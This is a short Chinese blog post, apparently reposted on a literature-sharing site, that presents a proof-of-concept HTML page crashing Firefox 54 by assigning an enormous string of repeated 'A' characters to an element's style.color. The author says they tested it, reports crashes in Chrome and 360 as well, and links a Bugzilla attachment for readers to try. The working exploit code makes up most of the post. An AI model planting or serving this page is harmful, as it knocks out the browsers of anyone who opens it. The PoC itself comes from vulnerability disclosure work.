最新版火狐远程DoS漏洞，亲测成功

最新版火狐远程DoS漏洞，亲测成功

作者: 流弊的小白 | 来源:发表于2017-07-10 13:53 被阅读0次

火狐浏览器Firefox 54.0.1（最新版）远程DoS漏洞
问题出在某些标签的超长样式及颜色属性字符串。
POC如下：

<html>
<body>
<script>
//Windows 7 x64
//FireFox v53.0.3 (32-bit) Crashes
//Credits: John Page / hyp3rlinx
//ISR: ApparitionSec
//hyp3rlinx.altervista.org

var p1 = "\x41";
for (var c=0;c<0xC350;c++){
p1+="\x41";
}
var p2="\x41";
for (c=0;c<0x1388;c++){
p2 += p1;
}        
var el = document.createElement('FORM') //IMG,FORM,DIV,P,A,H2,IFRAME,TABLE,TEXTAREA
el.style.color=p2
document.body.appendChild(el)
          
</script>
</body>

</html>

Firefox奔溃就不截图了.........因为卡死了

想直接测试的可点击下面的链接：
https://bug1376692.bmoattachments.org/attachment.cgi?id=8881644

Google Chrome奔溃

360奔溃

相关链接如下
https://bugzilla.mozilla.org/show_bug.cgi?id=1376692#a465096_417288

相关文章

网友评论

本文标题：最新版火狐远程DoS漏洞，亲测成功

本文链接：https://www.haomeiwen.com/subject/nwiyhxtx.html

延伸阅读

深度阅读

您也可以注册成为美文阅读网的作者，发表您的原创作品、分享您的心情！

栏目导航

热点阅读

关于我们|服务条款|联系我们|最新版火狐远程DoS漏洞，亲测成功|投稿指南|网站地图|RSS订阅|排版工具|手机版

提供经典美文摘抄,优美散文欣赏,现代诗歌精选,短篇小说,心情随笔,表白情书范文,故事会在线阅读欣赏

Copyright © 2014-2023 Haomeiwen.com All Rights Reserved. 好美文阅读网版权所有

备案信息：桂公网安备 45052102000051号 · 桂ICP备13007215号-3

本站所收录作品、热点评论等信息部分来源互联网，目的只是为了系统归纳学习和传递资讯

所有作品版权归原创作者所有，与本站立场无关，如不慎侵犯了你的权益，请联系我们告知，我们将做删除处理！